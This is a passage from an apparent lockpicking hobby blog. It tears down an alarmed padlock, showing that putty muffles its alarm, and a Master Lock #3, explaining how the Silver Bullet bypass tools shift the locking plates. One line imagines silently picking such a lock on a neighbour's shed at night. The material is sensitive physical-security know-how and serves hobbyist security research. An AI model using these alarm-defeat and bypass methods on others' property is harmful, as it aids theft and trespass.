<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7LYEIbHoxpaMPFAslZ8zk9gXB1nLbso-qNTwAkqJCEMOaOdus1K6xneckgjS04n-AFnXIaQ1fXNTEdp1wfAlXcylDDq4NAuj59oLhw1k2waXBlESbD5glIHb5YJUDe25Yd_w6ULpSfc/s1600/Shackle1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7LYEIbHoxpaMPFAslZ8zk9gXB1nLbso-qNTwAkqJCEMOaOdus1K6xneckgjS04n-AFnXIaQ1fXNTEdp1wfAlXcylDDq4NAuj59oLhw1k2waXBlESbD5glIHb5YJUDe25Yd_w6ULpSfc/s320/Shackle1.jpg" width="299" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVguDkkK1jWBEpACO3IK0vsfza0wk04eDMiOhkWpv1zGEMG_9xdtleyX4d1sK9F6q7GnwseHA2phYIMN4rtrjlHD65788ehzbShgpfoAUHmobi3Qt4NLbHuEzFQiXJ1gEXxKZY25VY8dI/s1600/Shackle2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVguDkkK1jWBEpACO3IK0vsfza0wk04eDMiOhkWpv1zGEMG_9xdtleyX4d1sK9F6q7GnwseHA2phYIMN4rtrjlHD65788ehzbShgpfoAUHmobi3Qt4NLbHuEzFQiXJ1gEXxKZY25VY8dI/s320/Shackle2.jpg" width="320" /></a></div>
<br />
Here's the lock and the part that interacts with the shackle to prevent its unintended removal from the lock:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqUniakUYJtS6vIF-41_YPBHPMnRdL5WG8Inc8Xjj8FPJ38D7_I9cEBwNF2CjSnJcQMdq9V0LYZ6EQC-D4bH-5Ukltr0WFgyJLjYsVh1zjyMJWZJoBpvz3qUtR00GjKLzTWv_dLXhWjI/s1600/Cam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqUniakUYJtS6vIF-41_YPBHPMnRdL5WG8Inc8Xjj8FPJ38D7_I9cEBwNF2CjSnJcQMdq9V0LYZ6EQC-D4bH-5Ukltr0WFgyJLjYsVh1zjyMJWZJoBpvz3qUtR00GjKLzTWv_dLXhWjI/s320/Cam.jpg" width="320" /></a></div>
<br />
<br />
<br />
Insert the key and turn, and the little wing there moves out of the path of the groove on the outside of the shackle.<br />
<br />
On the product package it touts that the alarm has an "Anti-muffle design: alarm sound can not be concealed"<br />
<br />
That, friends, is a lie.<br />
<br />
BEHOLD!!! My magic sound dampening putty<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLG48lrUbYsyE3_nP4WmSuQH-j50wOnaqviOv_vDOUpoce3X8hUIchh0ABFZwk9i_OOQKzRxgBH8EEefeyCYOr7EI-n16g9ypvob7ryJd_5Z1eYff1hJpHvad77z_L3AGvHWpTEpPa9as/s1600/Magic_Audio_Muting_Material.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLG48lrUbYsyE3_nP4WmSuQH-j50wOnaqviOv_vDOUpoce3X8hUIchh0ABFZwk9i_OOQKzRxgBH8EEefeyCYOr7EI-n16g9ypvob7ryJd_5Z1eYff1hJpHvad77z_L3AGvHWpTEpPa9as/s320/Magic_Audio_Muting_Material.jpg" width="251" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">It's actually just magnetic silly putty, but it works really, really well.</td></tr>
</tbody></table>
<br />
<br />
Apply it to the lock as shown:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieU4KapNr1IN4IZGsXALi7E8lgG10xkJUazMYecTgdy3zoAYKhD4VDc1GnLWoC39yVwaRpEC7oJ2C0Iue6ztG8DqHel-KK_q71CSB5zKiYxYYM3lwMe63UTOarnTzi8mdgXpz0Q7QeNoQ/s1600/Audio_Bypass.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieU4KapNr1IN4IZGsXALi7E8lgG10xkJUazMYecTgdy3zoAYKhD4VDc1GnLWoC39yVwaRpEC7oJ2C0Iue6ztG8DqHel-KK_q71CSB5zKiYxYYM3lwMe63UTOarnTzi8mdgXpz0Q7QeNoQ/s320/Audio_Bypass.jpg" width="293" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMQSywMCKE2xTvI4YmpOJh8CmcCVrjUrFJpm87xiwElfSSBdKamr-JBUPSDcDLzI3bNyP8_psg5qoDujqqaQV4ZG2_Iwhls6XDl_R40ypz8y1SuXLtVlTppzlbZMybFBD6u_jO5D1wEPY/s1600/Audio_Bypass2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMQSywMCKE2xTvI4YmpOJh8CmcCVrjUrFJpm87xiwElfSSBdKamr-JBUPSDcDLzI3bNyP8_psg5qoDujqqaQV4ZG2_Iwhls6XDl_R40ypz8y1SuXLtVlTppzlbZMybFBD6u_jO5D1wEPY/s320/Audio_Bypass2.jpg" width="320" /></a></div>
Once this is in place, that lion's roar of an ear-shattering sound is reduced to a kitten's squeak. It's completely tolerable. More along the lines of a kid's toy buried under some stuffed animals than a rampaging 110 dB alarm.<br />
<br />
Part of the reason this works so well is that they've weatherproofed the lock so well to keep the internals dry. The only place loud sound can get out is at the vents on the bottom. VERY minimal sound can escape through the rest of the lock. Had they done a poorer job of making it watertight, you wouldn't be able to muffle it as well and that 110 dB would be leaking out of everywhere.<br />
They did one thing right, and it makes the lock worse.<br />
<br />
I would feel comfortable picking this lock on a shed in someone's back yard while they slept in their house with the putty over the lock, there's no way they would hear it.<br />
<br />
I haven't tried it yet, but I bet submerging the vents in water would also muffle the sound greatly. I also have an idea about using a paper clip to press against the speaker or puncturing the speaker, thus rendering the alarm function null and void. I'll do that later, after I'm done with the other experiments.<br />
<br />
Alright so we now know we can muffle the sound. But what exactly does it take to set off the alarm, how sensitive is it? Well if I knew more about circuitry I could probably tell you. If anyone can give me some insight on the components on the circuit board that would be awesome, just leave something in the comments.<br />
<br />
As it stands, all I can do is just hit and shake the thing to see if it would go off. Given the lack of support I was receiving that night in my journey towards knowledge (did I mention that alarm is REALLY loud??) (Really really loud) (DAMN that thing is loud), I had to rig up a visual method to find out if the alarm was being tripped.<br />
<br />
I got an old LED, a 9V battery connector, and some electrical tape and rigged myself up a visual alarm that would light the LED when the alarm is triggered.<br />
<br />
Here's the video of me smacking it with a screwdriver. Not very elegant, but I couldn't set the thing off by just shaking it in my hand; I had to hit it with something:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dxmZPtvqXdYgpmaoqiRT0Ulw1oxeNP0yrDKbCpHMj5GXIPB2f6WLe-3WepvJ1MR-WOYm9x31yse3ups4PnO1w' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
You actually have to smack it pretty hard, several times, to get it to go off, and it's kind enough to give you a 3-beep warning before it actually goes off. When it does go off, it triggers the alarm for 10 seconds, then it automatically resets itself, I assume to save batteries.<br />
<br />
So there you have it.<br />
<br />
I have yet to get intimate with the lock itself, but I hope that at least one part of this padlock is worth its salt. As it stands I wouldn't use this thing to guard anything I considered valuable. I'm fairly certain if you stuck any key in the lock, or a sturdy tension tool, and turned it, the pin holding the lock in place would give out and the whole thing would just fall apart.<br />
<br />
I'll update this when I've laid bare the secrets of the lock itself.<br />
<br />
Master Lock #3 Padlock teardown and the Peterson Silver Bullet Bypass (2012-08-21)<br />
<br />
I don't own many bypass tools. To be exact, I own two: one of my own making and the Peterson Silver Bullet for Master Lock Padlocks.<br />
I picked up the Silver Bullet at Defcon from the Merch area; it looked deceptively simple from the example lock and demonstration. I just so happened to have a #3 padlock I had brought with me, so I bought it.<br />
<br />
I spent the next several days trying to figure out how in the hell to use the damned things. I read the directions a few hundred times, I looked online and all I saw was a lot of videos showing how easy it was and descriptions of "you just slide this one in, press down, then slide the other one in and press down".<br />
<br />
I could not get it to work.<br />
<br />
Furthermore there was nothing online that showed exactly how it worked, what it moved, and what the lock looks like inside.<br />
<br />
So I decided to tear my lock apart and take a look for myself and see exactly what the hell I was supposed to be doing in there.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_t5P0tKFMa0bS1brhWkEaEYfxAj9qvQUQ5HGctduquPcLtkggzhPJrC9CkSJoNfipRChN8NHWpVV7D9Valu3S0CCgM0VET8u9QBszplcrr2soEZXNOYHKNmUgY_GEQRG1jAue4Mtp5Nk/s1600/Face.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_t5P0tKFMa0bS1brhWkEaEYfxAj9qvQUQ5HGctduquPcLtkggzhPJrC9CkSJoNfipRChN8NHWpVV7D9Valu3S0CCgM0VET8u9QBszplcrr2soEZXNOYHKNmUgY_GEQRG1jAue4Mtp5Nk/s1600/Face.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">It's a #3; it got a bit ground off</td></tr>
</tbody></table>
So these here are the bypass tools, one marked A (shorter) and one marked B (longer). I've added a bit of heat shrink as a makeshift grip because these are very thin and are hard to hold onto if your fingers are sweaty; also, after a few hours of trying to get these to open the lock, my fingers were getting sore from the edges of the metal.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgjvdMdWKjg0ybKJ1DM3-uI1dn7sYmqB-nPt75gJYSiYkTaqDVWvVN5SrhXLYKSWHWAKEdw26vDZXRhFc4voEr9enpTQTIYTkxBbjbJH3aqIBYysElSOPkJVm-YjKkUBokfUyIg8RuJzs/s1600/Silver+Bullet.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgjvdMdWKjg0ybKJ1DM3-uI1dn7sYmqB-nPt75gJYSiYkTaqDVWvVN5SrhXLYKSWHWAKEdw26vDZXRhFc4voEr9enpTQTIYTkxBbjbJH3aqIBYysElSOPkJVm-YjKkUBokfUyIg8RuJzs/s320/Silver+Bullet.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Peterson Silver Bullet Bypass w/ "custom" grips</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
Here's the lock with the face and the unimportant plates removed. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpK6SLdFglhE2JhgoW2q5923TbOKJQyi614lopAvEfxlBycQIgV2wGF7GMqPPBzEPUyKnSzW8sEWt_v3weIvjNCCyLvreeVwsYH6mCCcawGn3BRj9AQ8HtlegSoVSI5sYEwzw18Zn4gp0/s1600/Exposed_Cylinder.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpK6SLdFglhE2JhgoW2q5923TbOKJQyi614lopAvEfxlBycQIgV2wGF7GMqPPBzEPUyKnSzW8sEWt_v3weIvjNCCyLvreeVwsYH6mCCcawGn3BRj9AQ8HtlegSoVSI5sYEwzw18Zn4gp0/s1600/Exposed_Cylinder.jpg" /></a></div>
This is what the "unimportant" plates look like. The inside shape is identical on all of them. The ones near the bottom (where you insert the key) of the lock are smaller on the outside to accommodate the blue plastic "Master" wrap the locks have on them.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEpJo2k97BaSZW1zWTY9yPFMhumIdum2dn8HvIZV7EF29_Bh_3H153ZmljmhGi9Il3qwvPcIr9Ix7KocXzDXMqDu-fSV-XSjexGxtso3IM_t0zw-w0wgutgnxnOJFVnQ6JNCuk1RV96A/s1600/Standard_Plate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEpJo2k97BaSZW1zWTY9yPFMhumIdum2dn8HvIZV7EF29_Bh_3H153ZmljmhGi9Il3qwvPcIr9Ix7KocXzDXMqDu-fSV-XSjexGxtso3IM_t0zw-w0wgutgnxnOJFVnQ6JNCuk1RV96A/s1600/Standard_Plate.jpg" /></a></div>
<br />
This is the lock cylinder. Nothing fancy, just a 4-pin setup with no security pins. The back has a protrusion that, when the shear point is reached and the plug is turned, interacts with a post that moves the locking plates and releases the shackle.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZqvK03X7y78kR7ypvODmeBHUK7iHe2vMtz5piFJxySECmZ1qnK5ONxeOLB8DXTpndX13ytrYVg5WugQgR-e6qWhtegcXSOOtmIOynUkZ06fhI_YDRFWa-HqdHByFyAN7mczNnX5MHQA/s1600/Cylinder1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZqvK03X7y78kR7ypvODmeBHUK7iHe2vMtz5piFJxySECmZ1qnK5ONxeOLB8DXTpndX13ytrYVg5WugQgR-e6qWhtegcXSOOtmIOynUkZ06fhI_YDRFWa-HqdHByFyAN7mczNnX5MHQA/s200/Cylinder1.jpg" width="129" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj2Qoe3PvmBX-lbkMd-B8RHy1hOqWhyytstu1briIZtbD5pKAeP_koJGiMVQgBD_wYBs_w8TV9Wc6HcFH95zjYKbsjVjyW-EEOvok4uYWJqudUYX5YdpX4AdLOqmdXIoxCl3RZ5VO4QP0/s1600/Cylinder2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj2Qoe3PvmBX-lbkMd-B8RHy1hOqWhyytstu1briIZtbD5pKAeP_koJGiMVQgBD_wYBs_w8TV9Wc6HcFH95zjYKbsjVjyW-EEOvok4uYWJqudUYX5YdpX4AdLOqmdXIoxCl3RZ5VO4QP0/s200/Cylinder2.jpg" width="200" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJJf3ixJMuR8eIAqoUdxEs2HcXSskw8ZGQ4940nPl98FDy3qNsFXA0ezm1dgP84T75NVNYpoAsPSX4CbfTTvMsM902BS0eszwihyphenhyphenKmQR3_WspW9KmJsJsr9BguAQRRWCrVvf2c1kXSMuE/s1600/Cylinder3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJJf3ixJMuR8eIAqoUdxEs2HcXSskw8ZGQ4940nPl98FDy3qNsFXA0ezm1dgP84T75NVNYpoAsPSX4CbfTTvMsM902BS0eszwihyphenhyphenKmQR3_WspW9KmJsJsr9BguAQRRWCrVvf2c1kXSMuE/s200/Cylinder3.jpg" width="141" /></a></div>
<br />
This is the padlock without the plug. Finally I was able to see what was going on in there.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheK95tLk86le-C9iZeEMNGLs8Xfqv8vhFqfeEaDbKzbeW6Ocp5ZfCxLQ4rIheggyj1QOqMyDp3c2VK8t7Lk4hRAMCnZWQhnpc8FgRTUAG36oLU2KOakPd48CU-KBWlTV0GgrT8ZpNGG4U/s1600/Internals.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheK95tLk86le-C9iZeEMNGLs8Xfqv8vhFqfeEaDbKzbeW6Ocp5ZfCxLQ4rIheggyj1QOqMyDp3c2VK8t7Lk4hRAMCnZWQhnpc8FgRTUAG36oLU2KOakPd48CU-KBWlTV0GgrT8ZpNGG4U/s320/Internals.jpg" width="156" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Outlined in yellow are the locking plates; red is the post that rotates to move the plates and release the shackle</td></tr>
</tbody></table>
Here's a larger picture of the internals of the padlock.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3PZjNpbuSstNcL12nP4C31mfhBMInj-otibeBdD-8o-7JZLwkdkZfaCinCWa2oPCr24-n0pJGHNHDprnHJd-7n-yEEwbYO-Tg68unKtQaYoz6pgLholne5QAf2Hz8xIJWTzUzWdO2dI/s1600/Internals-High.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3PZjNpbuSstNcL12nP4C31mfhBMInj-otibeBdD-8o-7JZLwkdkZfaCinCWa2oPCr24-n0pJGHNHDprnHJd-7n-yEEwbYO-Tg68unKtQaYoz6pgLholne5QAf2Hz8xIJWTzUzWdO2dI/s640/Internals-High.jpg" width="408" /></a></div>
<br />
This is what the locking plates look like<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3av1bcMZDpPzDc5ZH3nJggXsntfVxxLGUUrh0Aob5jqqAcPu3m1wTkbsHmJDbvOZm-HHuC_R0D0UgNfMaTNLszeXAuram4xbU2I9ZgjQYFbwZRRNFGiNaO0G6f-TUu645a9bg9mUxL4M/s1600/Locking_Plate_Single.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3av1bcMZDpPzDc5ZH3nJggXsntfVxxLGUUrh0Aob5jqqAcPu3m1wTkbsHmJDbvOZm-HHuC_R0D0UgNfMaTNLszeXAuram4xbU2I9ZgjQYFbwZRRNFGiNaO0G6f-TUu645a9bg9mUxL4M/s320/Locking_Plate_Single.jpg" width="320" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBxWgUbob6UKoiIUgFeS69Z72f_ZgTG1ps3Y95RdObEydBb-1AQpCGSgGGAQqO92d_zl5oDd25ghi1rW_QKQbtN4nBIEVHNHV6T3uQzWKA_H4WOE0kfSFyRftDfaNYbX15KUIuJWmXKeg/s1600/Locking_Plate_Single2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBxWgUbob6UKoiIUgFeS69Z72f_ZgTG1ps3Y95RdObEydBb-1AQpCGSgGGAQqO92d_zl5oDd25ghi1rW_QKQbtN4nBIEVHNHV6T3uQzWKA_H4WOE0kfSFyRftDfaNYbX15KUIuJWmXKeg/s320/Locking_Plate_Single2.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">You can see the scratches where I've been using the bypass on this one.</td></tr>
</tbody></table>
<br />
So this is how the bypass actually works<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh448eem3DptcoL5hmMiTFzYsNCM1_XKU4S0Im-IxCSUkZ-OABgDWFwxYqEVB5XuBUdCmoPIZXvTzX0-BZppRV7n2tZCOXXoMsQtjxBqMesMUeVwK1p1ZYDcdCeP87GZgQnY4u475a8wX0/s1600/Bypass_Part_A.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh448eem3DptcoL5hmMiTFzYsNCM1_XKU4S0Im-IxCSUkZ-OABgDWFwxYqEVB5XuBUdCmoPIZXvTzX0-BZppRV7n2tZCOXXoMsQtjxBqMesMUeVwK1p1ZYDcdCeP87GZgQnY4u475a8wX0/s640/Bypass_Part_A.jpg" width="376" /></a></div>
This is with the A bypass inserted. Normally you would slide this in while pressing the pins up in the lock to be able to access this, then you have to find where the locking plate contacts the post and press; it will move out of the way without a lot of pressure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqTbGbPtvnYWau_tLJ6oE2hqJubuvGYHZ_phhbbKcErn4X92gy-h2Jp9QAnTBS56RqMp43Ho0CcyEL7_tezd4WRkJX9CpWJj4ef0YcKRShyphenhyphen_cVQKwa0r_cFFeFwTRLqwe79zVZnkMwdjw/s1600/Full_Bypass.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqTbGbPtvnYWau_tLJ6oE2hqJubuvGYHZ_phhbbKcErn4X92gy-h2Jp9QAnTBS56RqMp43Ho0CcyEL7_tezd4WRkJX9CpWJj4ef0YcKRShyphenhyphen_cVQKwa0r_cFFeFwTRLqwe79zVZnkMwdjw/s640/Full_Bypass.jpg" width="294" /></a></div>
<br />
This is with both A and B bypass tools in their proper position. The B tool has to reach the second locking plate, which is about 2 plates further down than the first locking plate. Once the A tool is inserted properly it moves the locking plate, which also reduces the opening available to get the B tool into its proper position.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx7dNnV_Yq-gVPQgGa1b4JBNHLS7F2YYUmgOJ1EtCvi5acjI8moXIIRP4t91P9PK58LDa-4mdz8BF6nmp7qxm0Hy82GKn6R3MTiWx8nk2u9YuM1kmfWCbra0k2IxkMD6Iirm1j4kinUGw/s1600/Full_Bypass_Small.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx7dNnV_Yq-gVPQgGa1b4JBNHLS7F2YYUmgOJ1EtCvi5acjI8moXIIRP4t91P9PK58LDa-4mdz8BF6nmp7qxm0Hy82GKn6R3MTiWx8nk2u9YuM1kmfWCbra0k2IxkMD6Iirm1j4kinUGw/s400/Full_Bypass_Small.jpg" width="133" /></a></div>
<br />
<br />
Here are some more pictures of the locking mechanism and post.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OvDCVEbqwEfCciyU_qhnhlV04KkXRQKvdS9ypL4KrnCDsubDIMd2s6VyRb81prf6VkpH1ZWTnNyJH75TT0KPLg9MQFbf4OUud4mLXfDbegw8f10TCck-vjzWzsDAP-_3ZM6pyOj77wM/s1600/Plug.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OvDCVEbqwEfCciyU_qhnhlV04KkXRQKvdS9ypL4KrnCDsubDIMd2s6VyRb81prf6VkpH1ZWTnNyJH75TT0KPLg9MQFbf4OUud4mLXfDbegw8f10TCck-vjzWzsDAP-_3ZM6pyOj77wM/s1600/Plug.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Post, there is a 3 stamped in the middle</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4eCMp-RdSGcsl11qpFUt4sbfj_0yBcQVFqe2walOFt5-e_oUdOITLn0k3OYoudy2JIjw0kgnnRn6yb09O8GJrIoWWiHV4Epq7vgnhnzzIQjkJpB899e5z3joATbh-IzXT3RH18TZsXU/s1600/Plug_side.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4eCMp-RdSGcsl11qpFUt4sbfj_0yBcQVFqe2walOFt5-e_oUdOITLn0k3OYoudy2JIjw0kgnnRn6yb09O8GJrIoWWiHV4Epq7vgnhnzzIQjkJpB899e5z3joATbh-IzXT3RH18TZsXU/s1600/Plug_side.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Side View, when turned the sides contact the locking plates and press them against the springs</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9nUpwUT2s4Hbi1jwjyPS9aHRwnSav6RXIO1ppckwkDrPbaplx2H3KV3cd-TPN9LHn9-5-VTpw5FExCo42Zhm04NgUWdbYxq1do6_E7vQj1x6YCdvXjsD79R7wjdugYZfo-w5fc25lad0/s1600/Plug_top.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9nUpwUT2s4Hbi1jwjyPS9aHRwnSav6RXIO1ppckwkDrPbaplx2H3KV3cd-TPN9LHn9-5-VTpw5FExCo42Zhm04NgUWdbYxq1do6_E7vQj1x6YCdvXjsD79R7wjdugYZfo-w5fc25lad0/s1600/Plug_top.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Top, furthest from where the key is inserted into the lock.</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wVvCr5cNVvU_kuVUYdeP-1obZPDNoBoNlsG8atBc7i0rdMHprFWzk6P8BuY2i_cQCx3pXMky0hrUv7HCgaOpIrsHbraNgyCSEqLtYL3N-uCsVU-0U6ihIZj4XAI1b_mSu7m_Nj4Ip2o/s1600/Top_Locking+Plate.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wVvCr5cNVvU_kuVUYdeP-1obZPDNoBoNlsG8atBc7i0rdMHprFWzk6P8BuY2i_cQCx3pXMky0hrUv7HCgaOpIrsHbraNgyCSEqLtYL3N-uCsVU-0U6ihIZj4XAI1b_mSu7m_Nj4Ip2o/s320/Top_Locking+Plate.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Lock with Top Plate removed, this is the locking plate that the B tool interacts with</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUK8UKM1MN-iIh_hTVaxsxfpAK8O8fIfYcvyKBsM5qXFUqeRJ3AAWNgu5dUZJZGehkSGVcZzqoM4Svz6iZbj3rZ5SjAOYNQoaR_pSFoR1owPDd8Jf9NZ-JY1L-woBkA3K1k-mMsTqgcQ/s1600/Lower_Lockin_Plate.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUK8UKM1MN-iIh_hTVaxsxfpAK8O8fIfYcvyKBsM5qXFUqeRJ3AAWNgu5dUZJZGehkSGVcZzqoM4Svz6iZbj3rZ5SjAOYNQoaR_pSFoR1owPDd8Jf9NZ-JY1L-woBkA3K1k-mMsTqgcQ/s320/Lower_Lockin_Plate.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Lock with Top Plates removed, this is the plate the A tool interacts with</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
